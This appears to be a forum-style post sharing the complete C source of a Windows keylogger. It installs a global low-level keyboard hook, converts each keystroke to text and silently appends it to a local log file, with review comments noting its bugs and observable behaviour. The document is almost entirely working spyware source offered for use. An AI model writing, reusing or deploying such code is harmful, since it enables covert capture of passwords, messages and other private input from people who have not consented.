Here is a simple keylogger I wrote a while ago:
#include <windows.h>
/* Output file name. The path is relative, so the file is created in whatever
 * directory is current for the process when WinMain runs. */
#define LOG_PATH "log.txt"
/* Handle to the output file; assigned in WinMain and written to in MessageProc. */
HANDLE hFile;
/* Handle of the installed hook; assigned in WinMain and passed to
 * CallNextHookEx in MessageProc. */
HHOOK hHook;
/* Hook callback registered with SetWindowsHookEx; defined after WinMain. */
LRESULT CALLBACK MessageProc(int nCode, WPARAM wParam, LPARAM lParam);
/*
 * Program entry point: opens the log file, registers MessageProc as a
 * low-level keyboard hook, then sits in a message loop.
 *
 * Returns 1 if the log file cannot be created, 2 if the hook cannot be
 * installed, and 0 once GetMessage stops returning a positive value.
 * None of the four parameters is used.
 *
 * Observable behaviour, useful when triaging a process like this one:
 *   - it never creates a window;
 *   - it creates/truncates LOG_PATH (CREATE_ALWAYS) and opens it with a
 *     share mode of 0, so no other process can open the file while this
 *     handle is open;
 *   - it registers a WH_KEYBOARD_LL hook with a NULL module handle and
 *     thread id 0, i.e. a hook that is not tied to one thread.
 *
 * NOTE(review): this function never calls UnhookWindowsHookEx or CloseHandle;
 * the hook and the file handle are simply left for process exit.
 */
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE HHGG, LPSTR lpCmdLine, int nShowCmd)
{
    hFile = CreateFile(TEXT(LOG_PATH), GENERIC_WRITE | GENERIC_READ, 0, NULL,
                       CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return 1;
    }

    hHook = SetWindowsHookEx(WH_KEYBOARD_LL, MessageProc, NULL, 0);
    if (!hHook) {
        return 2;
    }

    /* A low-level hook is serviced by the thread that installed it, so that
     * thread has to keep pumping messages for the callback to be invoked.
     * NOTE(review): GetMessage is handed a NULL MSG pointer here. */
    for (;;) {
        if (GetMessage(NULL, NULL, 0, 0) <= 0) {
            break;
        }
    }

    return 0;
}
/*
 * Hook callback for the WH_KEYBOARD_LL hook stored in hHook.
 *
 * For every event whose low word of wParam is WM_KEYDOWN it translates the
 * key into text using the foreground window's keyboard layout and appends
 * that text, unencrypted, to hFile. Every other event is passed on untouched.
 * The return value is always whatever CallNextHookEx returns, so the
 * keystroke itself is delivered normally.
 *
 * Side effect: calls ExitProcess(3) if there is no foreground window.
 *
 * NOTE(review): nCode is never inspected before lParam is dereferenced; the
 * hook contract expects a negative nCode to be forwarded without processing.
 * NOTE(review): the buffer is TCHAR but ToUnicodeEx writes WCHARs and is told
 * the buffer holds 256 of them; the two only agree in a UNICODE build.
 * NOTE(review): the results of GetKeyboardState, ToUnicodeEx and WriteFile
 * are all ignored.
 */
LRESULT CALLBACK MessageProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    TCHAR text[256] = {0};
    BYTE keys[256];
    KBDLLHOOKSTRUCT event;
    HWND foreground;
    HKL layout;
    DWORD written;

    if (LOWORD(wParam) == WM_KEYDOWN) {
        /* Work on a local copy of the event record that lParam points to. */
        event = *(KBDLLHOOKSTRUCT *)lParam;

        /* Snapshot the key-state table, then overwrite the three modifier
         * entries with values queried individually through GetKeyState. */
        GetKeyboardState(keys);
        keys[VK_SHIFT] = (BYTE)GetKeyState(VK_SHIFT);
        keys[VK_CAPITAL] = (BYTE)GetKeyState(VK_CAPITAL);
        keys[VK_CONTROL] = (BYTE)GetKeyState(VK_CONTROL);

        foreground = GetForegroundWindow();
        if (foreground == NULL) {
            ExitProcess(3);
        }

        /* The layout is taken from the thread that owns the foreground window. */
        layout = GetKeyboardLayout(GetWindowThreadProcessId(foreground, 0));

        ToUnicodeEx(event.vkCode, event.scanCode, keys, text, 256, 0, layout);

        /* text was zero-filled above, so lstrlen yields the number of
         * characters ToUnicodeEx produced (0 if it produced none). */
        WriteFile(hFile, text, sizeof(TCHAR) * lstrlen(text), &written, NULL);
    }

    return CallNextHookEx(hHook, nCode, wParam, lParam);
}
In order to understand it, start with SetWindowsHookEx.